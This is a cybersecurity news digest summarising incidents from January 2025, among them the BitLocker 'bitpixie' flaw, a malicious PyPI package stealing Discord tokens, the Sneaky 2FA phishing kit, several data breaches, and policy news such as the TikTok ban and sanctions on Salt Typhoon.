π What’s happening in cybersecurity today?
Windows BitLocker Flaw, PyPI Package, Discord Tokens, Backdoor, 2FA Phishing Kit, Microsoft 365, Outlook Crashes, IoT Botnet, Global DDoS Attacks, Otelier Data Breach, Marriott, Hilton, Hyatt, NewsBank Data Breach, Capital One Outage, Blacon High School, Cheshire UK, Garden of Life, Ransomware Attack, TikTok U.S. Ban, U.S. Sanctions, Chinese Cyber Actor, CISA, Software Understanding Gap, Rhino Linux, Google, Open Source Library, Software Composition Analysis.
Listen to the full podcast
π¨Β Cyber Alerts
Cybersecurity researchers uncovered a serious flaw in the Windows BitLocker encryption system, enabling attackers to bypass its security without physically disassembling the laptop. The exploit, named “bitpixie,” allows attackers to downgrade the Windows Boot Manager, extracting critical encryption keys like the Volume Master Key. As a result, attackers can access encrypted data even without breaching user authentication or tampering with hardware components.
A malicious package called “pycord-self” was discovered on PyPI, targeting Discord developers by mimicking the popular “discord.py-self” library. The malicious package is designed to steal Discord authentication tokens and set up a backdoor for remote control, making it possible for attackers to hijack accounts and maintain persistent access. Developers are advised to verify the authenticity of packages and inspect code for suspicious activity to avoid such attacks.
Cybersecurity researchers have uncovered a new adversary-in-the-middle (AitM) phishing kit called Sneaky 2FA, designed to steal Microsoft 365 credentials and two-factor authentication codes. Discovered by Sekoia in December 2024, the kit is sold as phishing-as-a-service through Telegram and boasts advanced anti-bot measures. With nearly 100 phishing domains already detected, the kit uses fake authentication pages that appear legitimate to lure victims into entering sensitive information.
Microsoft has released a temporary fix for a bug causing classic Outlook to crash when users write, reply to, or forward emails. This issue emerged after updating Outlook for Microsoft 365, 2021, 2019, and 2016 to Version 2412 (Build 18324.20168) on January 7, triggering exception code “0xc0000005.” The company confirmed that the issue affects Outlook users and will be resolved with an official update on January 28, 2025. Until the fix is available, users can revert to the previous version by using a workaround involving the Command Prompt.
A newly discovered IoT botnet has been orchestrating large-scale DDoS attacks globally since late 2024, exploiting vulnerabilities in connected devices. Researchers warn that the botnet, using malware derived from Mirai and Bashlite, poses a significant threat to industries and critical infrastructure. The botnet targets devices like routers and IP cameras, exploiting weak passwords and remote code execution vulnerabilities to initiate attacks across North America, Europe, and Japan. Security experts recommend using updated firmware, changing default passwords, and isolating IoT devices to limit the damage caused by these attacks.
π₯ Cyber Incidents
In 2024, Otelier, a hotel management software provider, suffered a significant data breach that exposed personal information from customers of well-known hotel chains like Marriott, Hilton, and Hyatt. The breach occurred after a threat actor gained unauthorized access to Otelier’s cloud-based system, which serves over 10,000 properties worldwide. Data compromised in the attack includes 437,000 customer email addresses, names, physical addresses, phone numbers, travel booking details, and in some cases, partial credit card information.
NewsBank recently reported a data breach to the Attorney General of Maine, revealing that sensitive personal identifiable information may have been accessed and acquired by an unauthorized third party. The company became aware of suspicious activity in its network on July 1, 2024, and initiated an investigation to assess the scope of the incident. The breach occurred between June 20, 2024, and July 1, 2024, during which sensitive data, such as names, Social Security numbers, driverβs license numbers, financial account information, and payment card details, could have been exposed.
Capital One experienced a major service outage that started on January 16, 2025, preventing thousands of customers from accessing their accounts. The outage was caused by a power failure at FIS Global, a third-party vendor responsible for some of Capital Oneβs services, including payment processing and deposits. Customers took to social media to voice their frustrations, with many unable to pay bills or access funds during the downtime. This incident follows a similar outage at Citibank and highlights the significant impact service disruptions have on both customers and businesses.
Blacon High School in Cheshire, United Kingdom, has temporarily closed after a ransomware attack compromised its systems. The school will remain shut for Monday and Tuesday, with an independent cyber-security firm working to assess the breach. Head teacher Rachel Hudson confirmed the attack occurred on Friday, and the school will reopen once it is safe, providing updates as the investigation progresses. Meanwhile, students are being asked to access lessons via Google Classroom.
Garden of Life, LLC recently notified consumers about a data breach that may have exposed personal information. On December 18, 2024, the company discovered that a third party had accessed the software used for processing payment card information on its website. This unauthorized access took place in July 2024, affecting consumers’ names, addresses, email addresses, credit card or debit card numbers, expiration dates, and CVV numbers.
π’ Cyber News
On January 19, 2025, TikTok became temporarily unavailable in the U.S. due to a federal ban, following a Supreme Court ruling that requires the app’s Chinese parent company, ByteDance, to either sell TikTok or face a shutdown. The ban has left millions of users unable to access content or download the app, affecting other ByteDance products as well. The decision stems from national security concerns, particularly regarding data collection practices and potential Chinese government influence.
The U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) has sanctioned a Chinese cybersecurity company and a Shanghai-based cyber actor linked to the Salt Typhoon group for their role in a breach of the Treasury’s IT systems. The hack, which exploited vulnerabilities in BeyondTrust’s systems, compromised over 400 computers and stole sensitive data, including policy and travel documents. This move is part of the U.S. government’s ongoing efforts to hold accountable those responsible for cyberattacks against U.S. infrastructure.
The U.S. government, led by agencies like CISA, DARPA, OUSD R&E, and NSA, is urging decisive steps to close the software understanding gap in national security and critical infrastructure systems. This gap stems from a lack of capacity to fully verify software, leaving mission operators unable to secure software by design, address defects quickly, or protect against exploits. The report emphasizes that countries like China and Russia have already invested heavily in understanding software to secure their own systems, and the U.S. must act to stay competitive in geopolitics.
Rhino Linux 2025.1 has arrived with a fresh set of features and updates, marking a significant step forward for the distribution. A standout addition is the “Hello Rhino” app, designed to assist with the post-installation experience, offering easy access to community links and documentation. The Unicorn Desktop has been enhanced with dynamic workspaces, streamlining workflow by automatically creating and removing workspaces as needed. Rhino Linux 2025.1 also ships with a sleek custom GRUB theme, providing a modern, cohesive visual experience from the moment the system boots.
Google has launched OSV-SCALIBR, an open-source software composition analysis library designed to help developers identify vulnerabilities and manage software inventory. The Go-based library is an extensible file system scanner that supports Linux, Windows, and macOS, and can analyze software packages, binaries, and source code. OSV-SCALIBR can be used as a standalone binary or integrated into Go projects, and it offers capabilities such as generating software bills of materials and vulnerability scanning.
Copyright Β© 2025Β CyberMaterial. All Rights Reserved.
